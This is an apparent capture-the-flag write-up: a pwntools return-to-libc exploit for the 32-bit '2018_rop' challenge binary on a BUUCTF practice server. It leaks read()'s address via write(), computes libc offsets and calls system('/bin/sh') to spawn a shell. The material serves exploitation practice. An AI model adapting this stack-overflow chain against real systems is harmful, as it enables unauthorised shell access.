代码
程序存在栈溢出漏洞，但利用前需要先确定目标所使用的 libc 版本。
Exp
from pwn import *
from LibcSearcher import *
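# Two-stage return-to-libc script for the 32-bit "2018_rop" binary.
# Stage 1 leaks the runtime address of read() from the GOT; stage 2 uses the
# leak to compute libc addresses and call system() on libc's "/bin/sh" string.
#
# NOTE(review): the chain relies on fixed PLT/GOT/main addresses taken from
# the ELF file and on an unprotected saved return address, so the binary is
# presumably built without PIE and without stack canaries -- confirm with
# checksec. Either mitigation would break this script as written.

# Connect to the remote instance; the commented line below runs a local copy.
r = remote("node5.buuoj.cn",29369)
#r = process("2018_rop")
#libc = ELF("libc6_2.23-0ubuntu11.3_i386.so")
# Parse the local binary only to look up symbol, PLT and GOT addresses.
elf = ELF("2018_rop")
#if args.G:
# gdb.attach(r, "b *0x0804849b\r\n")
write_plt = elf.plt['write']
read_got = elf.got['read']
start_addr = elf.sym['main']

# Stage 1: 140 filler bytes (presumably the distance from the buffer to the
# saved return address -- confirm against the binary), then a cdecl frame for
# write(1, read_got, 4) whose return address is main, so the program asks for
# input a second time after the leak.
# The filler must be bytes: p32() returns bytes, and str + bytes raises
# TypeError on Python 3.
payload = b"a"*140+p32(write_plt)+p32(start_addr)+p32(0x1)+p32(read_got)+p32(0x4)
r.sendline(payload)
# recv read
# recvn() waits for exactly 4 bytes; recv(4) may return fewer, which would
# make u32() fail.
read_addr = u32(r.recvn(4))
print("read_addr is:",hex(read_addr))
# NOTE(review): this LibcSearcher object is never consulted below; the offsets
# that follow are hard-coded for one specific libc build, and the page does
# not say which. A different libc on the target makes every address wrong.
libc = LibcSearcher('read', read_addr)
# libcbase
read_offset = 0x0e5620   # offset of read() inside that libc
sys_addr = 0x03cd10      # offset of system() (an offset, despite the name)
bin_addr = 0x17b8cf      # offset of the "/bin/sh" string
base_addr = read_addr-read_offset
system_addr = base_addr+sys_addr
binsh_str = base_addr+bin_addr

# Stage 2: same overflow, now returning into system(binsh_str). The p32(1)
# word sits in the return-address slot, so the process crashes if system()
# ever returns.
payload = b"a"*140+p32(system_addr)+p32(1)+p32(binsh_str)
r.sendline(payload)
r.interactive()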
...